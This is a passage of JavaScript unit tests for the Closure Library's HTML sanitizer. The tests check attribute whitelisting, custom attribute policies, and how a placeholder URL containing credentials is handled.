                                  .build();
  var input = '<p alt="nope" aria-checked="true" zzz="1">b</p>' +
      '<a target="_blank">c</a>';
  assertSanitizedHtml(input, '<p>b</p><a>c</a>', noAttributesSanitizer);
}
1356

1357

1358
/**
 * Checks that onlyAllowAttributes throws when the list contains the
 * attribute name 'zzz' next to 'alt'.
 */
function testOnlyAllowUnWhitelistedAttr() {
  var allowUnknownAttribute = function() {
    var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
    builder.onlyAllowAttributes(['alt', 'zzz']);
  };
  assertThrows(allowUnknownAttribute);
}
1364

1365

1366
/**
 * Checks that an onlyAllowAttributes entry with tagName '*' is expected to
 * keep the attribute on every element while all other attributes are removed.
 */
function testOnlyAllowAttributeWildCard() {
  var altOnAnyTag = {tagName: '*', attributeName: 'alt'};
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .onlyAllowAttributes([altOnAnyTag])
                      .build();
  assertSanitizedHtml(
      '<div alt="yes" aria-checked="true"><img alt="yep" avbb="no" /></div>',
      '<div alt="yes"><img alt="yep" /></div>', sanitizer);
}
1376

1377

1378
/**
 * Checks a wildcard onlyAllowAttributes entry whose policy uses the tagName
 * hint to accept 'label' on anchors only.
 */
function testOnlyAllowAttributeLabelForA() {
  var labelOnAnchorsOnly = {
    tagName: '*',
    attributeName: 'label',
    policy: function(value, hints) {
      return hints.tagName === 'a' ? value : null;
    }
  };
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .onlyAllowAttributes([labelOnAnchorsOnly])
                      .build();
  assertSanitizedHtml(
      '<a label="3" aria-checked="4">fff</a><img label="3" />',
      '<a label="3">fff</a><img />', sanitizer);
}
1395

1396

1397
/**
 * Checks that a policy attached to an onlyAllowAttributes entry decides per
 * value whether the attribute is kept: alt="yes" is expected to survive,
 * alt="no" (policy returns null) to be removed. The policy also verifies the
 * attributeName hint it receives.
 */
function testOnlyAllowAttributePolicy() {
  var input = '<img alt="yes" /><img alt="no" />';
  var expected = '<img alt="yes" /><img />';
  assertSanitizedHtml(
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
                           .onlyAllowAttributes([{
                             tagName: '*',
                             attributeName: 'alt',
                             policy: function(value, hints) {
                               // jsunit order is (expected, actual).
                               assertEquals('alt', hints.attributeName);
                               return value === 'yes' ? value : null;
                             }
                           }])
                           .build());
}
1412

1413

1414
/**
 * Checks that the value returned by a custom policy for a[target] ('_blank')
 * is expected to appear in the output in place of the original value. The
 * policy also verifies the attributeName hint it receives.
 */
function testOnlyAllowAttributePolicyPipe1() {
  var input = '<a target="hello">b</a>';
  var expected = '<a target="_blank">b</a>';
  assertSanitizedHtml(
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
                           .onlyAllowAttributes([{
                             tagName: 'a',
                             attributeName: 'target',
                             policy: function(value, hints) {
                               // jsunit order is (expected, actual).
                               assertEquals('target', hints.attributeName);
                               return '_blank';
                             }
                           }])
                           .build());
}
1429

1430

1431
/**
 * Checks that when a custom policy for a[target] returns 'nope', the target
 * attribute is expected to be absent from the output. The policy also
 * verifies the attributeName hint it receives.
 */
function testOnlyAllowAttributePolicyPipe2() {
  var input = '<a target="hello">b</a>';
  var expected = '<a>b</a>';
  assertSanitizedHtml(
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
                           .onlyAllowAttributes([{
                             tagName: 'a',
                             attributeName: 'target',
                             policy: function(value, hints) {
                               // jsunit order is (expected, actual).
                               assertEquals('target', hints.attributeName);
                               return 'nope';
                             }
                           }])
                           .build());
}
1446

1447

1448
/**
 * Checks that onlyAllowAttributes throws when a custom policy is supplied
 * for img[src].
 */
function testOnlyAllowAttributeSpecificPolicyThrows() {
  // Inline identity policy: this file does not goog.require goog.functions,
  // and a failing lookup of goog.functions.identity inside the callback would
  // itself satisfy assertThrows.
  var identityPolicy = function(value) {
    return value;
  };
  assertThrows(function() {
    new goog.html.sanitizer.HtmlSanitizer.Builder().onlyAllowAttributes([
      {tagName: 'img', attributeName: 'src', policy: identityPolicy}
    ]);
  });
}
1455

1456

1457
/**
 * Checks that onlyAllowAttributes throws when a custom policy is supplied
 * for the 'target' attribute with the wildcard tag name '*'.
 */
function testOnlyAllowAttributeGenericPolicyThrows() {
  // Inline identity policy: this file does not goog.require goog.functions,
  // and a failing lookup of goog.functions.identity inside the callback would
  // itself satisfy assertThrows.
  var identityPolicy = function(value) {
    return value;
  };
  assertThrows(function() {
    new goog.html.sanitizer.HtmlSanitizer.Builder().onlyAllowAttributes([{
      tagName: '*',
      attributeName: 'target',
      policy: identityPolicy
    }]);
  });
}
1466

1467

1468
/**
 * Checks that after onlyAllowAttributes has been called twice, ending with
 * only 'aria-checked' allowed, a further call asking for 'alt' throws.
 */
function testOnlyAllowAttributeRefineThrows() {
  var firstWhitelist =
      ['aria-checked', {tagName: 'LINK', attributeName: 'HREF'}];
  var builder = new goog.html.sanitizer.HtmlSanitizer.Builder()
                    .onlyAllowAttributes(firstWhitelist);
  builder = builder.onlyAllowAttributes(['aria-checked']);
  var allowAlt = function() {
    builder.onlyAllowAttributes(['alt']);
  };
  assertThrows(allowAlt);
}
1478

1479

1480
/**
 * Checks that a URL containing credentials (user:password@host) is expected
 * to be preserved both in an inline background-image style and in an img src
 * when goog.html.SafeUrl.sanitize is the network request URL policy and CSS
 * styles are allowed. Not run on IE8/IE9.
 */
function testUrlWithCredentials() {
  if (isIE8() || isIE9()) {
    return;
  }
  // IE has trouble getting and setting URL attributes with credentials. Both
  // HTMLSanitizer and assertHtmlMatches are affected by the bug, hence the use
  // of plain string matching.
  // The URL must really carry a "user:password@" part for this test to
  // exercise credentials.
  var url = 'http://foo:bar@example.com';
  var input = '<div style="background-image: url(\'' + url + '\');">' +
      '<img src="' + url + '" /></div>';
  var expectedIE = '<div style="background-image: url(&quot;' + url +
      '&quot;);"><img src="' + url + '" /></div>';
  var sanitizer =
      new goog.html.sanitizer.HtmlSanitizer.Builder()
          .withCustomNetworkRequestUrlPolicy(goog.html.SafeUrl.sanitize)
          .allowCssStyles()
          .build();
  if (goog.userAgent.EDGE_OR_IE) {
    assertEquals(
        expectedIE, goog.html.SafeHtml.unwrap(sanitizer.sanitize(input)));
  } else {
    assertSanitizedHtml(input, input, sanitizer);
  }
}
1504

1505
Product

Resources

Company